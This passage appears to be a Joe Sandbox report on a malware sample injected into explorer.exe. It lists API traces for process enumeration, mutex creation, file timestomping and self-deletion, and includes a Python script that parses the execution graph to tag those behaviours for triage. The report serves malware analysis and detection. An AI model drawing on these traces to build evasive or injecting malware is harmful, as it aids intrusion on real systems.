  • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
Memory Dump Source
• Source File: 00000000.00000002.1582608813.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RmbF3635xY.jbxd
Similarity
• API ID: CreateDuplicateObjectSectionSleep
• String ID:
• API String ID: 4152845823-0

APIs
• Sleep.KERNELBASE(00001388), ref: 0040194E
  • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
  • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
Memory Dump Source
• Source File: 00000000.00000002.1582608813.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RmbF3635xY.jbxd
Similarity
• API ID: CreateDuplicateObjectSectionSleep
• String ID:
• API String ID: 4152845823-0

APIs
• LocalAlloc.KERNELBASE(00000000,00513D6C,00418DAF), ref: 00418748
Memory Dump Source
• Source File: 00000000.00000002.1582631929.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_40b000_RmbF3635xY.jbxd
Similarity
• API ID: AllocLocal
• String ID:
• API String ID: 3494564517-0

Strings
Memory Dump Source
• Source File: 00000000.00000002.1582993231.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5e0000_RmbF3635xY.jbxd
Yara matches
Similarity
• API ID:
• String ID: .$GetProcAddress.$l
• API String ID: 0-2784972518

Memory Dump Source
• Source File: 00000000.00000002.1582608813.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RmbF3635xY.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Strings
Memory Dump Source
• Source File: 00000000.00000002.1582608813.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RmbF3635xY.jbxd
Similarity
• API ID:
• String ID: us<
• API String ID: 0-3812821218

Memory Dump Source
• Source File: 00000000.00000002.1583256735.000000000067D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0067D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_67d000_RmbF3635xY.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:

Memory Dump Source
• Source File: 00000000.00000002.1582608813.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RmbF3635xY.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Memory Dump Source
• Source File: 00000000.00000002.1582608813.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RmbF3635xY.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

Memory Dump Source
• Source File: 00000000.00000002.1582608813.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RmbF3635xY.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1582608813.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmbF3635xY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c2fb1fcd810030a7c701492efe6b1583806f24c29ad391e8378491e72e53c4f9
                                                                                                                    • Instruction ID: 10c1f8c9815bd1bae344db256f26ecf9b321a2c49f9f40fa9571263b21f216dd
                                                                                                                    • Opcode Fuzzy Hash: c2fb1fcd810030a7c701492efe6b1583806f24c29ad391e8378491e72e53c4f9
                                                                                                                    • Instruction Fuzzy Hash: 17113636404206CFD715DF10AA895A8B721BB55704B14007ACE521B0C1A3BD6113970B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1582608813.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmbF3635xY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ad580f4852e8641318215a16f7c63f70c318642c86c98d9f634171b4294914d4
                                                                                                                    • Instruction ID: f3401649f1529dc56ca8e0e6371485d35b9042d0b2056da4c8f47593e1f5965b
                                                                                                                    • Opcode Fuzzy Hash: ad580f4852e8641318215a16f7c63f70c318642c86c98d9f634171b4294914d4
                                                                                                                    • Instruction Fuzzy Hash: 7701263644420ACFDB1AEF11E9896E8B732FB55704B5401BACE565B0C1E37D6113D70B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1582608813.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmbF3635xY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0d17a2e63e4f1915686b689582fba0273351ae16582c8cdc9572b60fe9b5c197
                                                                                                                    • Instruction ID: ab8b863e00b9434e1dbf8970a3beebb42fa128e0550c32edf730788d57ebd560
                                                                                                                    • Opcode Fuzzy Hash: 0d17a2e63e4f1915686b689582fba0273351ae16582c8cdc9572b60fe9b5c197
                                                                                                                    • Instruction Fuzzy Hash: 1001263640434ACFCB16EF11E9895E4BB32BF45708B4801A6CE565B092E3793122D70B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1582993231.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_5e0000_RmbF3635xY.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                    • Instruction ID: e79c77a33d3e2958be64fda7cb60edd6142e77e0db177738c83660cdaacb83ea
                                                                                                                    • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                    • Instruction Fuzzy Hash: 1E01F272A006408FDF25DF61CD04BAB37E9FB86306F0544B4D94AD72C2E3B0A8818F80
                                                                                                                    APIs
                                                                                                                    • QueryDosDeviceW.KERNEL32(00000000,?,00000000), ref: 00418A04
                                                                                                                    • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00418A1F
                                                                                                                    • HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 00418A42
                                                                                                                    • GetNumaProcessorNode.KERNEL32(?,00000000), ref: 00418A51
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1582631929.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40b000_RmbF3635xY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2776817195-0
                                                                                                                    • Opcode ID: 87efacac19a89b0c53b9dbb33d5e1312a162f1387c04757d6307752c4e174176
                                                                                                                    • Instruction ID: bd9cb2cda3ccdbb603686fa1a54157cb247b1e4b5f6e470ed3bcac1d3601a900
                                                                                                                    • Opcode Fuzzy Hash: 87efacac19a89b0c53b9dbb33d5e1312a162f1387c04757d6307752c4e174176
                                                                                                                    • Instruction Fuzzy Hash: ED018474A402049BD760EB64EC55BE937B8FB1C755F00807BFA05A72D0DE746E88CB9A
                                                                                                                    APIs
                                                                                                                    • BuildCommDCBA.KERNEL32(00000000,?), ref: 00418964
                                                                                                                    • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00418976
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1582631929.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40b000_RmbF3635xY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BuildCommEnvironmentFreeStrings
                                                                                                                    • String ID: -
                                                                                                                    • API String ID: 2991353152-2547889144
                                                                                                                    • Opcode ID: a724ab6c00ba43ed920c74289dad73afc07e5f40d831fe2fe4a3629ab1fe5b50
                                                                                                                    • Instruction ID: b4672369b185086f5e4321c569724b1a241b362aa46ae39454cd2dcc54bfc028
                                                                                                                    • Opcode Fuzzy Hash: a724ab6c00ba43ed920c74289dad73afc07e5f40d831fe2fe4a3629ab1fe5b50
                                                                                                                    • Instruction Fuzzy Hash: 2DF0FCB18242449ADB119BA5DD807FE7B68E709330F51422EED0466240CB794EC59797

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:39.1%
                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                    Signature Coverage:3.5%
                                                                                                                    Total number of Nodes:201
                                                                                                                    Total number of Limit Nodes:21
                                                                                                                    execution_graph 2605 85819b8 2606 85819c9 2605->2606 2607 8581952 2605->2607 2608 8581a03 2606->2608 2610 8581a10 2606->2610 2611 8581a60 7 API calls 2610->2611 2612 8581a22 2611->2612 2613 8581a3d 2612->2613 2614 8581a2b SleepEx 2612->2614 2613->2608 2614->2614 2615 8581a3b 2614->2615 2616 8582254 2 API calls 2615->2616 2617 8581a50 2616->2617 2618 8581e1c 9 API calls 2617->2618 2619 8581a58 2618->2619 2620 29919b8 2621 29919c9 2620->2621 2622 2991952 2620->2622 2625 2991a10 2621->2625 2626 2991a60 12 API calls 2625->2626 2627 2991a22 2626->2627 2628 2991a03 2627->2628 2629 2991a2b SleepEx 2627->2629 2629->2629 2630 2991a3b 2629->2630 2631 2992254 2 API calls 2630->2631 2632 2991a50 2631->2632 2633 2991e1c 21 API calls 2632->2633 2634 2991a58 2633->2634 2635 29917fb 2636 2991827 2635->2636 2637 2991901 2636->2637 2638 2991a10 36 API calls 2636->2638 2638->2637 2639 85817fb 2640 8581827 2639->2640 2641 8581944 2640->2641 2642 8581a10 19 API calls 2640->2642 2643 8581a03 2642->2643 2401 8581a10 2411 8581a60 2401->2411 2404 8581a3d 2405 8581a2b SleepEx 2405->2405 2406 8581a3b 2405->2406 2418 8582254 2406->2418 2413 8581a97 2411->2413 2412 8581a22 2412->2404 2412->2405 2413->2412 2414 8581b60 RtlCreateHeap 2413->2414 2415 8581b91 2414->2415 2415->2412 2416 8581d10 CreateThread 2415->2416 2417 8581d41 CreateThread 2416->2417 2436 8583c84 2416->2436 2417->2412 2433 8583d60 2417->2433 2419 8582272 2418->2419 2441 8584ad0 2419->2441 2421 8581a50 2422 8581e1c 2421->2422 2447 8584d20 2422->2447 2424 8581e57 2425 8581e88 CreateMutexExA 2424->2425 2426 8581ea2 2425->2426 2451 8581f94 2426->2451 2431 8581f4e 2455 85822fc 2431->2455 2461 8582d60 2431->2461 2434 8583d72 EnumWindows SleepEx 2433->2434 2435 8583d96 2433->2435 2434->2434 2434->2435 2437 8583d3b 2436->2437 2438 8583ca1 CreateToolhelp32Snapshot 2436->2438 2439 8583d23 SleepEx 2438->2439 2440 8583cb5 
2438->2440 2439->2437 2439->2438 2440->2439 2442 8584af9 2441->2442 2443 8584b0d GetTokenInformation 2442->2443 2446 8584b6a 2442->2446 2444 8584b38 2443->2444 2445 8584b42 GetTokenInformation 2444->2445 2445->2446 2446->2421 2448 8584d4d GetVolumeInformationA 2447->2448 2450 8584da0 2448->2450 2450->2424 2452 8581fb7 2451->2452 2453 8581f0d CreateFileMappingA 2452->2453 2454 85820eb CreateFileW 2452->2454 2453->2431 2454->2453 2456 858232d 2455->2456 2464 858337c CreateFileW 2456->2464 2458 8582342 2466 858239c 2458->2466 2460 8582353 2460->2431 2462 858337c CreateFileW 2461->2462 2463 8582d83 2462->2463 2463->2431 2465 85833d1 2464->2465 2465->2458 2467 85823ef 2466->2467 2468 85826fc DeleteFileW DeleteFileW 2467->2468 2471 8582789 2467->2471 2469 858271e 2468->2469 2470 8582765 SleepEx RtlExitUserThread 2469->2470 2470->2471 2471->2460 2472 2991a10 2482 2991a60 2472->2482 2475 2991a3d 2476 2991a2b SleepEx 2476->2476 2477 2991a3b 2476->2477 2488 2992254 2477->2488 2484 2991a97 2482->2484 2483 2991a22 2483->2475 2483->2476 2484->2483 2485 2991b60 RtlCreateHeap 2484->2485 2486 2991b91 2485->2486 2486->2483 2487 2991d10 CreateThread CloseHandle CreateThread CloseHandle 2486->2487 2487->2483 2505 2993d60 2487->2505 2508 2993c84 2487->2508 2489 2992272 2488->2489 2516 2994ad0 2489->2516 2491 2991a50 2492 2991e1c 2491->2492 2522 2994d20 2492->2522 2494 2991e57 2495 2991e88 CreateMutexExA 2494->2495 2496 2991ea2 2495->2496 2526 2994e90 2496->2526 2498 2991ee1 2531 2991f94 2498->2531 2503 2991f4e 2543 29922fc 2503->2543 2549 2992d60 2503->2549 2506 2993d72 EnumWindows SleepEx 2505->2506 2507 2993d96 2505->2507 2506->2506 2506->2507 2509 2993d3b 2508->2509 2510 2993ca1 CreateToolhelp32Snapshot 2508->2510 2511 2993d23 SleepEx 2510->2511 2512 2993cb5 Process32First 2510->2512 2511->2509 2511->2510 2514 2993ccd 2512->2514 2513 2993d1a CloseHandle 2513->2511 2514->2513 2515 2993d08 Process32Next 2514->2515 2515->2514 2517 2994af9 2516->2517 2518 2994b0d GetTokenInformation 
2517->2518 2521 2994b6a 2517->2521 2519 2994b38 2518->2519 2520 2994b42 GetTokenInformation 2519->2520 2520->2521 2521->2491 2523 2994d4d GetVolumeInformationA 2522->2523 2525 2994da0 2523->2525 2525->2494 2529 2994eb2 2526->2529 2527 2994f6e ObtainUserAgentString 2527->2498 2528 2994ef3 RegQueryValueExA 2528->2529 2529->2528 2530 2994f46 2529->2530 2530->2527 2533 2991fb7 2531->2533 2532 2991f0d CreateFileMappingA 2532->2503 2533->2532 2534 299201b DeleteFileW CopyFileW 2533->2534 2542 29920ce 2533->2542 2534->2532 2535 299203b DeleteFileW 2534->2535 2538 2992051 2535->2538 2537 29920eb CreateFileW 2537->2532 2539 2992086 DeleteFileW 2538->2539 2540 299209a 2539->2540 2558 29949b0 2540->2558 2552 2993520 2542->2552 2544 299232d 2543->2544 2565 299337c CreateFileW 2544->2565 2546 2992342 2567 299239c 2546->2567 2548 2992353 2548->2503 2550 299337c CreateFileW 2549->2550 2551 2992d83 2550->2551 2551->2503 2553 2993541 2552->2553 2554 2993561 GetUserNameW 2553->2554 2555 2993582 2554->2555 2563 2993678 CoCreateInstance 2555->2563 2557 299359d 2557->2537 2559 29949d7 2558->2559 2560 29949f7 SetFileAttributesW CreateFileW 2559->2560 2561 2994a42 SetFileTime 2560->2561 2562 2994a63 2561->2562 2562->2542 2564 29936d6 2563->2564 2564->2557 2566 29933d1 2565->2566 2566->2546 2591 2993e70 2567->2591 2569 2992648 2572 29926e7 2569->2572 2573 2992789 2569->2573 2586 2992660 2569->2586 2570 299282d 2571 2993e70 RtlReAllocateHeap 2570->2571 2577 2992854 2571->2577 2575 29926fc DeleteFileW DeleteFileW 2572->2575 2581 29927ec 2572->2581 2574 2993e70 RtlReAllocateHeap 2573->2574 2580 29927b0 2574->2580 2576 299271e 2575->2576 2579 2993e70 RtlReAllocateHeap 2576->2579 2578 29928d0 RtlReAllocateHeap 2577->2578 2577->2581 2578->2581 2582 2992748 2579->2582 2580->2581 2583 29928d0 RtlReAllocateHeap 2580->2583 2581->2548 2585 2992765 SleepEx RtlExitUserThread 2582->2585 2583->2581 2584 2993e70 RtlReAllocateHeap 2584->2586 2585->2581 2586->2572 2586->2581 2586->2584 2595 29928d0 
2586->2595 2588 29923ef 2588->2581 2589 29949b0 3 API calls 2588->2589 2590 2992624 2588->2590 2589->2590 2590->2569 2590->2570 2592 2993e9f 2591->2592 2601 299400c 2592->2601 2594 2993fbf 2594->2588 2596 2992cf3 2595->2596 2597 29928d9 2595->2597 2596->2586 2598 299400c RtlReAllocateHeap 2597->2598 2599 29929d8 2597->2599 2598->2599 2599->2596 2600 2993e70 RtlReAllocateHeap 2599->2600 2600->2596 2603 2994056 2601->2603 2604 299404f 2601->2604 2602 299433f RtlReAllocateHeap 2602->2603 2603->2602 2603->2604 2604->2594
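The execution graph above is exported as one flat token stream of node ids, addresses, API names and `a->b` edges, which is hard to triage by eye. The Python below is an added example for this page, not Joe Sandbox code: it parses that stream (the grammar is inferred from the dump and is an assumption), finds the entry node, lists the APIs reachable from it, marks which of them sit inside loops (the SleepEx polling loop and the CreateToolhelp32Snapshot/Process32Next enumeration loop the graph shows), and applies a small heuristic tag table of my own, not a Joe Sandbox signature set, that maps API combinations to the behaviours named in the report. `SAMPLE` is an excerpt of the explorer.exe graph for entry 0x2991a10, cut after CreateMutexExA.

```python
"""Parse a Joe Sandbox execution_graph text dump and triage it (added example).

Assumed grammar: whitespace-separated tokens where '<id> <hexaddr>' opens a
node, following identifiers are API names on that node, '<n> API calls' is a
size note, and '<a>-><b>' is an edge between node ids.
"""
import re
from collections import defaultdict, deque

_EDGE = re.compile(r"^(\d+)->(\d+)$")
_ID = re.compile(r"^\d+$")
_ADDR = re.compile(r"^[0-9a-f]{6,8}$")   # assumption: 32-bit, lowercase hex


class ExecGraph:
    def __init__(self):
        self.addr = {}                   # node id -> address string
        self.apis = defaultdict(list)    # node id -> API names on that node
        self.note = {}                   # node id -> "N API calls" annotation
        self.succ = defaultdict(list)    # node id -> successor node ids
        self.pred = defaultdict(list)    # node id -> predecessor node ids


def parse_execution_graph(text):
    toks = text.split()
    if toks and toks[0] == "execution_graph":
        toks = toks[1:]
    g, cur, i = ExecGraph(), None, 0
    while i < len(toks):
        t = toks[i]
        m = _EDGE.match(t)
        if m:
            a, b = int(m.group(1)), int(m.group(2))
            g.succ[a].append(b)
            g.pred[b].append(a)
            i += 1
        elif _ID.match(t) and i + 1 < len(toks) and _ADDR.match(toks[i + 1]):
            cur = int(t)                 # new node: id followed by address
            g.addr[cur] = toks[i + 1]
            i += 2
        elif cur is None:
            raise ValueError("attribute before any node: %r" % t)
        elif _ID.match(t) and toks[i + 1:i + 3] == ["API", "calls"]:
            g.note[cur] = " ".join(toks[i:i + 3])
            i += 3
        else:
            g.apis[cur].append(t)        # anything else is an API name
            i += 1
    return g


def entry_nodes(g):
    """Nodes with no predecessor: the roots the walk started from."""
    return [n for n in g.addr if not g.pred.get(n)]


def reachable_apis(g, start):
    """API names on nodes reachable from start, first-seen order, no repeats."""
    seen, q, out = {start}, deque([start]), []
    while q:
        n = q.popleft()
        for api in g.apis.get(n, []):
            if api not in out:
                out.append(api)
        for s in g.succ.get(n, []):
            if s not in seen:
                seen.add(s)
                q.append(s)
    return out


def nodes_in_cycles(g):
    """Node ids that can reach themselves: bodies of polling/enumeration loops."""
    looped = set()
    for n in g.addr:
        stack, seen = list(g.succ.get(n, [])), set()
        while stack:
            m = stack.pop()
            if m == n:
                looped.add(n)
                break
            if m not in seen:
                seen.add(m)
                stack.extend(g.succ.get(m, []))
    return looped


def loop_apis(g):
    return {api for n in nodes_in_cycles(g) for api in g.apis.get(n, [])}


# Heuristic tags: my own mapping from API combinations to the behaviours the
# report names, not a Joe Sandbox signature. Flag = APIs must be in a loop.
RULES = {
    "process enumeration loop": ({"CreateToolhelp32Snapshot", "Process32Next"}, True),
    "copy plus SetFileTime (timestomped drop)": ({"CopyFileW", "SetFileTime"}, False),
    "self-delete then exit thread": ({"DeleteFileW", "RtlExitUserThread"}, False),
}


def tag_behaviours(apis, looped):
    return [name for name, (needed, must_loop) in RULES.items()
            if needed <= set(apis) and (not must_loop or needed <= looped)]


def summarize(text):
    g = parse_execution_graph(text)
    looped = loop_apis(g)
    report = {}
    for e in entry_nodes(g):
        apis = reachable_apis(g, e)
        in_loops = sorted(a for a in apis if a in looped)
        report[g.addr[e]] = {"apis": apis, "in_loops": in_loops,
                             "tags": tag_behaviours(apis, set(in_loops))}
    return report


# Excerpt of the explorer.exe graph on this page (entry 0x2991a10).
SAMPLE = """execution_graph 2472 2991a10 2482 2991a60 2472->2482 2475 2991a3d
2476 2991a2b SleepEx 2476->2476 2477 2991a3b 2476->2477 2488 2992254 2477->2488
2484 2991a97 2482->2484 2483 2991a22 2483->2475 2483->2476 2484->2483
2485 2991b60 RtlCreateHeap 2484->2485 2486 2991b91 2485->2486 2486->2483
2487 2991d10 CreateThread CloseHandle CreateThread CloseHandle 2486->2487
2487->2483 2505 2993d60 2487->2505 2508 2993c84 2487->2508 2489 2992272
2488->2489 2516 2994ad0 2489->2516 2491 2991a50 2492 2991e1c 2491->2492
2522 2994d20 2492->2522 2494 2991e57 2495 2991e88 CreateMutexExA 2494->2495
2506 2993d72 EnumWindows SleepEx 2505->2506 2507 2993d96 2505->2507 2506->2506
2506->2507 2509 2993d3b 2508->2509 2510 2993ca1 CreateToolhelp32Snapshot
2508->2510 2511 2993d23 SleepEx 2510->2511 2512 2993cb5 Process32First
2510->2512 2511->2509 2511->2510 2514 2993ccd 2512->2514 2513 2993d1a
CloseHandle 2513->2511 2514->2513 2515 2993d08 Process32Next 2514->2515
2515->2514 2517 2994af9 2516->2517 2518 2994b0d GetTokenInformation 2517->2518
2521 2994b6a 2517->2521 2519 2994b38 2518->2519 2520 2994b42 GetTokenInformation
2519->2520 2520->2521 2521->2491 2523 2994d4d GetVolumeInformationA 2522->2523
2525 2994da0 2523->2525 2525->2494"""

if __name__ == "__main__":
    for addr, info in summarize(SAMPLE).items():
        print(addr, info["apis"])
        print("  in loops:", info["in_loops"])
        print("  tags:", info["tags"])
```

Run against the full dump above, the same code yields one summary per entry (the 0x8581… copy of the injected code and the 0x2991… copy), which makes the two injected regions easy to compare; the loop marking is what separates one-shot setup calls such as RtlCreateHeap and CreateMutexExA from the repeated process and window enumeration that the evasion signatures in the report refer to.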
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2713238316.0000000002991000.00000020.80000000.00040000.00000000.sdmp, Offset: 02991000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_2991000_explorer.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateInstance
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 542301482-0
                                                                                                                    • Opcode ID: b35aeaa2dabb4e76190c9dece0e8e20c87b044d0080395537af34a5cdc12a271
                                                                                                                    • Instruction ID: 2c546d8ae9526978a185af421171d218c8b40e700f390bd9745acf46c1c879d4
                                                                                                                    • Opcode Fuzzy Hash: b35aeaa2dabb4e76190c9dece0e8e20c87b044d0080395537af34a5cdc12a271
                                                                                                                    • Instruction Fuzzy Hash: 07E1E734608A488FCF94EF28C895EA9B7F5FFA9304F114699E44ACB265DB70E944CB41
                                                                                                                    APIs
                                                                                                                    • GetUserNameW.ADVAPI32 ref: 02993574
                                                                                                                      • Part of subcall function 02993678: CoCreateInstance.COMBASE ref: 029936C5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2713238316.0000000002991000.00000020.80000000.00040000.00000000.sdmp, Offset: 02991000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_2991000_explorer.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateInstanceNameUser
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3213660374-0
                                                                                                                    • Opcode ID: fd6447a474a0c6c4e583e87f53b4852dd761150ae4ae7b776ee82d00e2f1a7d0
                                                                                                                    • Instruction ID: 8f916ed3562d96b1b0af78c0e8a2525cd6ceb62f9bfe65420aba460d0bc3def0
                                                                                                                    • Opcode Fuzzy Hash: fd6447a474a0c6c4e583e87f53b4852dd761150ae4ae7b776ee82d00e2f1a7d0
                                                                                                                    • Instruction Fuzzy Hash: 34110A70718B4C8FCF90EF6C901876EB6D2EBDC320F950A6EA84EC3255DA7489458B81

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2713238316.0000000002991000.00000020.80000000.00040000.00000000.sdmp, Offset: 02991000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_2991000_explorer.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Create$CloseHandleThread$Heap
                                                                                                                    • String ID: iP+
                                                                                                                    • API String ID: 1490796931-51890417
                                                                                                                    • Opcode ID: 2cb0cc4895ba9d61a021ba4609a68b07abc7c0267e95d8eab074489c4e5da047
                                                                                                                    • Instruction ID: ab01b1a4762de24e4e1ecc7dd0720205e0d18f4480877edad0775f257b958bbb
                                                                                                                    • Opcode Fuzzy Hash: 2cb0cc4895ba9d61a021ba4609a68b07abc7c0267e95d8eab074489c4e5da047
                                                                                                                    • Instruction Fuzzy Hash: 4A91A230618E0A8FDF54EF2CD8916A573D6FF98311B44017E9C4ECB156EB34D9418B96

                                                                                                                    Control-flow Graph

Control-flow graph (rendered in the original report): basic blocks 858239c-85828c7; calls DeleteFileW (x2), SleepEx, RtlExitUserThread
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2716946130.0000000008581000.00000020.80000000.00040000.00000000.sdmp, Offset: 08581000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_8581000_explorer.jbxd
Yara matches
Similarity
• API ID: DeleteFile$ExitSleepThreadUser
• String ID: |:|
• API String ID: 2796381497-3736120136
• Opcode ID: fbb803279be7c0de3d631b165653baee0dbf7d5d4714adb9b6c3d05972f478bd
• Instruction ID: 9d529b197564fc65beabca8b4ae8e162bab05668f4080655d57a412ecd31d5a8
• Opcode Fuzzy Hash: fbb803279be7c0de3d631b165653baee0dbf7d5d4714adb9b6c3d05972f478bd
• Instruction Fuzzy Hash: 5CE1A230718F49CBDB19BB6884597BA76D1FB98312F10062FD49FD3280DF74A9428B86

Control-flow Graph

Control-flow graph (rendered in the original report): basic blocks 299239c-29928c7; calls DeleteFileW (x2), SleepEx, RtlExitUserThread
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2713238316.0000000002991000.00000020.80000000.00040000.00000000.sdmp, Offset: 02991000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2991000_explorer.jbxd
Yara matches
Similarity
• API ID: DeleteFile$ExitSleepThreadUser
• String ID: |:|
• API String ID: 2796381497-3736120136
• Opcode ID: fbb803279be7c0de3d631b165653baee0dbf7d5d4714adb9b6c3d05972f478bd
• Instruction ID: 459191823c6eb2359c2f158bc68bf55ee4d6d82bf64cb84f6d75c60703c5ff21
• Opcode Fuzzy Hash: fbb803279be7c0de3d631b165653baee0dbf7d5d4714adb9b6c3d05972f478bd
• Instruction Fuzzy Hash: BAE1A830718F488BDB19AB6C84597BA77D6FB98325F50062ED89FC3240DF74E9428786

Control-flow Graph

APIs
• DeleteFileW.KERNEL32 ref: 0299201E
• CopyFileW.KERNEL32 ref: 0299202D
• DeleteFileW.KERNEL32 ref: 0299203E
• DeleteFileW.KERNEL32 ref: 02992089
  • Part of subcall function 029949B0: SetFileAttributesW.KERNEL32 ref: 029949FF
  • Part of subcall function 029949B0: CreateFileW.KERNEL32 ref: 02994A29
  • Part of subcall function 029949B0: SetFileTime.KERNEL32 ref: 02994A54
• CreateFileW.KERNEL32 ref: 02992115
Memory Dump Source
• Source File: 00000002.00000002.2713238316.0000000002991000.00000020.80000000.00040000.00000000.sdmp, Offset: 02991000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2991000_explorer.jbxd
Yara matches
Similarity
• API ID: File$Delete$Create$AttributesCopyTime
• String ID:
• API String ID: 642576546-0
• Opcode ID: 11cbd7d4e9e3daf7bdfec7693b32ce184b43af76b4895d117b786d6ffa4ff202
• Instruction ID: c68c616ab317af92968f79b3b0c7a5cba74ab61473fd2ce442f231bba00a148a
• Opcode Fuzzy Hash: 11cbd7d4e9e3daf7bdfec7693b32ce184b43af76b4895d117b786d6ffa4ff202
• Instruction Fuzzy Hash: 4E414930718A4C4FDFA9AFAC945836E76D2EBCC320F54457EA80EC3285DE349D068B85

Control-flow Graph

Control-flow graph (rendered in the original report): basic blocks 2993c84-2993d54; calls CreateToolhelp32Snapshot, Process32First, Process32Next, CloseHandle, SleepEx
APIs
Memory Dump Source
